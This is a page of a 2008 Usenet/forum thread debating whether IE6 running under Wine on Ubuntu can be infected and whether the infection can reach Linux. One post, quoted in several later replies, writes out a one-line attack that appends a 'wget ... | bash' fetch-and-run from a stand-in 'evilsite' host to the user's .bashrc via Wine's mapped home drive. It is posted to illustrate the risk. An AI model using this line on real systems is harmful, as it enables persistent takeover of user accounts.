Will IE6 under Wine get infected? - Ubuntu

This is a discussion on Will IE6 under Wine get infected? - Ubuntu ; Let's say that I run IE6 under WINE. (which I have installed). And let's further say that I visit an evil, spyware infested website, such as http://o n l i n e p r i v a t e s ...

+ Reply to Thread
Page 1 of 8 1 2 3 ... LastLast
Results 1 to 20 of 145

  1. Will IE6 under Wine get infected?

    Let's say that I run IE6 under WINE. (which I have installed).

    And let's further say that I visit an evil, spyware infested website,
    such as

    http://o n l i n e p r i v a t e s c a n.com/2009/1/_freescan.php?id=880135

    using that IE6. Would the WINE software somehow get infected?

    posting on Usenet.
    http://improve-usenet.org/

  2. Re: Will IE6 under Wine get infected?

    On Sun, 28 Sep 2008 23:41:53 -0500, Ignoramus21406 wrote:
    >Let's say that I run IE6 under WINE. (which I have installed).

    >And let's further say that I visit an evil, spyware infested website,
    >such as

    >http://o n l i n e p r i v a t e s c a n.com/2009/1/_freescan.php?id=880135

    >using that IE6. Would the WINE software somehow get infected?

    The contents of the windows registry and "drive_c" in the user
    directory could be infected. The wine software itself
    isn't writeable by the user. This is one of those advantages of
    using technology that protects the system from it's users, technology
    available since the 60's that windows has still to this day failed to
    embrace.

    If you're worried about a screwed up wine setup for your user, just
    blow it away. ( 'rm -rf ~/.wine' )

  3. Re: Will IE6 under Wine get infected?

    On Mon, 29 Sep 2008 00:02:20 -0500, AZ Nomad wrote:

    > On Sun, 28 Sep 2008 23:41:53 -0500, Ignoramus21406 wrote:
    >>Let's say that I run IE6 under WINE. (which I have installed).

    >>And let's further say that I visit an evil, spyware infested website,
    >>such as

    >>http://o n l i n e p r i v a t e s c a n.com/2009/1/_freescan.php?id=880135

    >>using that IE6. Would the WINE software somehow get infected?

    > The contents of the windows registry and "drive_c" in the user
    > directory could be infected. The wine software itself
    > isn't writeable by the user. This is one of those advantages of
    > using technology that protects the system from it's users, technology
    > available since the 60's that windows has still to this day failed to
    > embrace.
    >
    > If you're worried about a screwed up wine setup for your user, just
    > blow it away. ( 'rm -rf ~/.wine' )

    It can effect any Windows program but will NOT effect Linux....
    IOW if you are running say Outlook under Wine and get a nasty, it CAN cause
    you troubles.
    If you are worried, blow it away using Synaptic.

    --
    Moshe Goldfarb
    Please visit The Hall of Linux Idiots:

  4. Re: Will IE6 under Wine get infected?

    Ignoramus21406 wrote:

    > Let's say that I run IE6 under WINE. (which I have installed).
    >
    > And let's further say that I visit an evil, spyware infested website,
    > such as
    >
    > http://o n l i n e p r i v a t e s c a
    > n.com/2009/1/_freescan.php?id=880135
    >
    > using that IE6. Would the WINE software somehow get infected?

    Possibly - it's actually fun to see the disaster that is Windows getting
    wrecked by malware in a safe, sandboxed environment! If you run into any
    problems, just use the usual Windoze solution - delete and reinstall Wine!

    Your Linux installation will be entirely safe from the malware that infests
    Windows, even if you're running malware in your Wine system!

    C.

  5. Re: Will IE6 under Wine get infected?

    Christopher Hunter wrote:
    > Your Linux installation will be entirely safe from the malware that infests
    > Windows, even if you're running malware in your Wine system!

    Just be a little careful, as the more recent installations of Wine
    attach your *real* home directory to the wine environment (as H:,
    IIRC). It's quite possible that a sandboxed virus/trojan/nasty could be
    less constrained than you realise.

    Chris

  6. Re: Will IE6 under Wine get infected?

    Chris Davies wrote:

    > Christopher Hunter wrote:
    >> Your Linux installation will be entirely safe from the malware that
    >> infests Windows, even if you're running malware in your Wine system!

    > Just be a little careful, as the more recent installations of Wine
    > attach your *real* home directory to the wine environment (as H:,
    > IIRC). It's quite possible that a sandboxed virus/trojan/nasty could be
    > less constrained than you realise.

    I saw that, and was somewhat concerned. I have seen recommendations (and
    followed them) to duplicate needed home directory files into another
    location for Wine access.

    C.

  7. Re: Will IE6 under Wine get infected?

    On Mon, 29 Sep 2008 08:40:54 +0100, Christopher Hunter wrote:

    > Ignoramus21406 wrote:
    >
    >> Let's say that I run IE6 under WINE. (which I have installed).
    >>
    >> And let's further say that I visit an evil, spyware infested website,
    >> such as
    >>
    >> http://o n l i n e p r i v a t e s c a
    >> n.com/2009/1/_freescan.php?id=880135
    >>
    >> using that IE6. Would the WINE software somehow get infected?

    > Possibly - it's actually fun to see the disaster that is Windows getting
    > wrecked by malware in a safe, sandboxed environment! If you run into
    > any problems, just use the usual Windoze solution - delete and reinstall
    > Wine!
    >
    > Your Linux installation will be entirely safe from the malware that
    > infests Windows, even if you're running malware in your Wine system!
    >
    > C.

    Does re-installing wine, remove the malware from the "c drive". I
    thought you had to run a virus program in wine, to clean the "c drive".

  8. Re: Will IE6 under Wine get infected?

    jellybean stonerfish wrote:

    > On Mon, 29 Sep 2008 08:40:54 +0100, Christopher Hunter wrote:
    >
    >> Ignoramus21406 wrote:
    >>
    >>> Let's say that I run IE6 under WINE. (which I have installed).
    >>>
    >>> And let's further say that I visit an evil, spyware infested website,
    >>> such as
    >>>
    >>> http://o n l i n e p r i v a t e s c a
    >>> n.com/2009/1/_freescan.php?id=880135
    >>>
    >>> using that IE6. Would the WINE software somehow get infected?

    >> Possibly - it's actually fun to see the disaster that is Windows getting
    >> wrecked by malware in a safe, sandboxed environment! If you run into
    >> any problems, just use the usual Windoze solution - delete and reinstall
    >> Wine!
    >>
    >> Your Linux installation will be entirely safe from the malware that
    >> infests Windows, even if you're running malware in your Wine system!
    >>
    >> C.

    > Does re-installing wine, remove the malware from the "c drive". I
    > thought you had to run a virus program in wine, to clean the "c drive".

    If you remove drive_c, then there's nothing to clean.

  9. Re: Will IE6 under Wine get infected?

    On Mon, 29 Sep 2008 10:56:39 +0100, Chris Davies wrote:

    > Christopher Hunter wrote:
    >> Your Linux installation will be entirely safe from the malware that infests
    >> Windows, even if you're running malware in your Wine system!

    > Just be a little careful, as the more recent installations of Wine
    > attach your *real* home directory to the wine environment (as H:,
    > IIRC). It's quite possible that a sandboxed virus/trojan/nasty could be
    > less constrained than you realise.
    >
    > Chris

    Interesting.
    I didn't realize that.

    --
    Moshe Goldfarb
    Please visit The Hall of Linux Idiots:
    http://linuxidiots.blogspot.com/
    Please Visit www.linsux.org

  10. Re: Will IE6 under Wine get infected?

    On 2008-09-29, Moshe Goldfarb. wrote:
    > On Mon, 29 Sep 2008 00:02:20 -0500, AZ Nomad wrote:
    >
    >> On Sun, 28 Sep 2008 23:41:53 -0500, Ignoramus21406 wrote:
    >>>Let's say that I run IE6 under WINE. (which I have installed).

    >>>And let's further say that I visit an evil, spyware infested website,
    >>>such as

    >>>http://o n l i n e p r i v a t e s c a n.com/2009/1/_freescan.php?id=880135

    >>>using that IE6. Would the WINE software somehow get infected?

    >> The contents of the windows registry and "drive_c" in the user
    >> directory could be infected. The wine software itself
    >> isn't writeable by the user. This is one of those advantages of
    >> using technology that protects the system from it's users, technology
    >> available since the 60's that windows has still to this day failed to
    >> embrace.
    >>
    >> If you're worried about a screwed up wine setup for your user, just
    >> blow it away. ( 'rm -rf ~/.wine' )

    > It can effect any Windows program but will NOT effect Linux....
    > IOW if you are running say Outlook under Wine and get a nasty, it CAN cause
    > you troubles.
    > If you are worried, blow it away using Synaptic.

    That's cool to hear. Of course, Windows has user separation also built
    in, but it is very impractical to not have admin privileges. You have
    to log out and log on a lot.

    posting on Usenet.
    http://improve-usenet.org/

  11. Re: Will IE6 under Wine get infected?

    On Mon, 29 Sep 2008 12:11:17 -0500, Ignoramus24410 wrote:

    > On 2008-09-29, Moshe Goldfarb. wrote:

    >>> The contents of the windows registry and "drive_c" in the user
    >>> directory could be infected. The wine software itself
    >>> isn't writeable by the user. This is one of those advantages of
    >>> using technology that protects the system from it's users, technology
    >>> available since the 60's that windows has still to this day failed to
    >>> embrace.
    >>>
    >>> If you're worried about a screwed up wine setup for your user, just
    >>> blow it away. ( 'rm -rf ~/.wine' )

    >> It can effect any Windows program but will NOT effect Linux....
    >> IOW if you are running say Outlook under Wine and get a nasty, it CAN cause
    >> you troubles.
    >> If you are worried, blow it away using Synaptic.
    >>

    > That's cool to hear. Of course, Windows has user separation also built
    > in, but it is very impractical to not have admin privileges. You have
    > to log out and log on a lot.

    Windows is a pita when it comes to user privilages.

    Also take into account what Chris said about newer versions of wine and
    your /home directory.

    That was news to me!
    --
    Moshe Goldfarb
    Please visit The Hall of Linux Idiots:
    http://linuxidiots.blogspot.com/
    Please Visit www.linsux.org

  12. Re: Will IE6 under Wine get infected?

    On 2008-09-29, Moshe Goldfarb. wrote:
    > On Mon, 29 Sep 2008 12:11:17 -0500, Ignoramus24410 wrote:

    >>> It can effect any Windows program but will NOT effect Linux....
    >>> IOW if you are running say Outlook under Wine and get a nasty, it CAN cause
    >>> you troubles.
    >>> If you are worried, blow it away using Synaptic.
    >>>

    >> That's cool to hear. Of course, Windows has user separation also built
    >> in, but it is very impractical to not have admin privileges. You have
    >> to log out and log on a lot.

    > Windows is a pita when it comes to user privilages.
    >
    > Also take into account what Chris said about newer versions of wine and
    > your /home directory.
    >
    > That was news to me!

    Very shocking news. A Windows virus, to infect a Linux box, would
    simply need to execute an equivalent of

    test -e H:/.bashrc && echo 'wget -O - http://evilsite/linuxvirus.sh | bash ' >> H:/.bashrc

    posting on Usenet.
    http://improve-usenet.org/

  13. Re: Will IE6 under Wine get infected?

    On Mon, 29 Sep 2008 12:11:17 -0500, Ignoramus24410 wrote:
    >On 2008-09-29, Moshe Goldfarb. wrote:

    >>> The contents of the windows registry and "drive_c" in the user
    >>> directory could be infected. The wine software itself
    >>> isn't writeable by the user. This is one of those advantages of
    >>> using technology that protects the system from it's users, technology
    >>> available since the 60's that windows has still to this day failed to
    >>> embrace.
    >>>
    >>> If you're worried about a screwed up wine setup for your user, just
    >>> blow it away. ( 'rm -rf ~/.wine' )

    >> It can effect any Windows program but will NOT effect Linux....
    >> IOW if you are running say Outlook under Wine and get a nasty, it CAN cause
    >> you troubles.
    >> If you are worried, blow it away using Synaptic.
    >>

    >That's cool to hear. Of course, Windows has user separation also built
    >in, but it is very impractical to not have admin privileges. You have
    >to log out and log on a lot.

    It's pretty much worthless. Most people would rather replace their computers
    annually when they get infected than play the log out, become admin, change the
    user to admin, log out, log in as admin'd user, do whatever, log out, log in as
    admin, change the user back, log out, and log back in as the user game.

  14. Re: Will IE6 under Wine get infected?

    On Mon, 29 Sep 2008 12:23:48 -0500, Ignoramus24410 wrote:
    >On 2008-09-29, Moshe Goldfarb. wrote:

    >>> That's cool to hear. Of course, Windows has user separation also built
    >>> in, but it is very impractical to not have admin privileges. You have
    >>> to log out and log on a lot.

    >> Windows is a pita when it comes to user privilages.
    >>
    >> Also take into account what Chris said about newer versions of wine and
    >> your /home directory.
    >>
    >> That was news to me!

    >Very shocking news. A Windows virus, to infect a Linux box, would
    >simply need to execute an equivalent of

    >test -e H:/.bashrc && echo 'wget -O - http://evilsite/linuxvirus.sh | bash ' >> H:/.bashrc

    Except that the kernel will most likely be immune as fixes for serious
    vulnerabilities tend to be made and distributed within a matter of days.

  15. Re: Will IE6 under Wine get infected?

    On 2008-09-29, AZ Nomad wrote:
    > On Mon, 29 Sep 2008 12:23:48 -0500, Ignoramus24410 wrote:

    >>> Windows is a pita when it comes to user privilages.
    >>>
    >>> Also take into account what Chris said about newer versions of wine and
    >>> your /home directory.
    >>>
    >>> That was news to me!

    >>Very shocking news. A Windows virus, to infect a Linux box, would
    >>simply need to execute an equivalent of

    >>test -e H:/.bashrc && echo 'wget -O - http://evilsite/linuxvirus.sh | bash ' >> H:/.bashrc

    > Except that the kernel will most likely be immune as fixes for serious
    > vulnerabilities tend to be made and distributed within a matter of days.

    The above is the way to take over the user's linux account. Which can
    be used to send spam, steal data, etc. Very bad even if the attacker
    does not get root.

    posting on Usenet.
    http://improve-usenet.org/

  16. Re: Will IE6 under Wine get infected?

    "AZ Nomad" wrote in message
    > On Mon, 29 Sep 2008 12:11:17 -0500, Ignoramus24410
    > wrote:

    >>> It can effect any Windows program but will NOT effect Linux....
    >>> IOW if you are running say Outlook under Wine and get a nasty, it CAN
    >>> cause
    >>> you troubles.
    >>> If you are worried, blow it away using Synaptic.
    >>>

    >>That's cool to hear. Of course, Windows has user separation also built
    >>in, but it is very impractical to not have admin privileges. You have
    >>to log out and log on a lot.

    > It's pretty much worthless. Most people would rather replace their
    > computers
    > annually when they get infected than play the log out, become admin,
    > change the
    > user to admin, log out, log in as admin'd user, do whatever, log out, log
    > in as
    > admin, change the user back, log out, and log back in as the user game.

    Really?
    I haven't had to log out and log in as admin for months.
    I expect most users would never need to log out and log on as admin either.
    Even the "I want to run as admin" prompt only pops up when I run my backup
    program or if I manually invoke the AV updater.
    It just that some people don't have a clue how to setup windows.

  17. Re: Will IE6 under Wine get infected?

    "Moshe Goldfarb." wrote in

    >> That's cool to hear. Of course, Windows has user separation also
    >> built in, but it is very impractical to not have admin privileges.
    >> You have to log out and log on a lot.

    FWIW, being one who has run various flavours of OSes since the '80's (all
    at the equivalent of "administrator") I find that linux's constant demand
    for passwords to do the most basic of changes is a REAL PITA and more so
    that Vista's UAC nagging. :-)

  18. Re: Will IE6 under Wine get infected?

    propman wrote:
    > "Moshe Goldfarb." wrote in
    >

    >>> That's cool to hear. Of course, Windows has user separation also
    >>> built in, but it is very impractical to not have admin privileges.
    >>> You have to log out and log on a lot.
    >>>

    > FWIW, being one who has run various flavours of OSes since the '80's (all
    > at the equivalent of "administrator") I find that linux's constant demand
    > for passwords to do the most basic of changes is a REAL PITA and more so
    > that Vista's UAC nagging. :-)

    I would rather have the minor PITA than the big one a virus would cause.
    My windows had a virus about 3 months ago sending out spam by the
    thousands and I didn't even know it until Comcast cut off my mail send
    port. When I called I got the usual barely competent East Indian and had
    to ask for his supervisor, who, as expected, knew nothing. I had to
    demand he connect me to the legal department where I found some actual
    knowledgeable people.
    That was XP, since Vista is never getting near this computer.
    To add insult to injury my granddaughter is being taught M$ powerpoint
    in 7th grade, and when I mentioned Linux i just got a blank stare.

    Bill Baka

  19. Re: Will IE6 under Wine get infected?

    On 2008-09-29, propman wrote:
    > "Moshe Goldfarb." wrote in
    >
    >>> That's cool to hear. Of course, Windows has user separation also
    >>> built in, but it is very impractical to not have admin privileges.
    >>> You have to log out and log on a lot.

    > FWIW, being one who has run various flavours of OSes since the '80's (all
    > at the equivalent of "administrator") I find that linux's constant demand
    > for passwords to do the most basic of changes is a REAL PITA and more so
    > that Vista's UAC nagging. :-)

    Keep in mind, though, that you do not need to log off and interrupt
    your session.

    posting on Usenet.
    http://improve-usenet.org/

  20. Re: Will IE6 under Wine get infected?

    Ignoramus24410 wrote:

    > On 2008-09-29, AZ Nomad wrote:
    >> On Mon, 29 Sep 2008 12:23:48 -0500, Ignoramus24410
    >> wrote:

    >>>Very shocking news. A Windows virus, to infect a Linux box, would
    >>>simply need to execute an equivalent of

    >>>test -e H:/.bashrc && echo 'wget -O - http://evilsite/linuxvirus.sh |
    >>>bash ' >> H:/.bashrc

    >> Except that the kernel will most likely be immune as fixes for serious
    >> vulnerabilities tend to be made and distributed within a matter of days.

    > The above is the way to take over the user's linux account. Which can
    > be used to send spam, steal data, etc. Very bad even if the attacker
    > does not get root.

    One simple solution - don't use wine. Who needs to run Windoze programs
    anyways? If you MUST, then run them in a VM.

    Cheers.

    --
    The world can't afford the rich.

+ Reply to Thread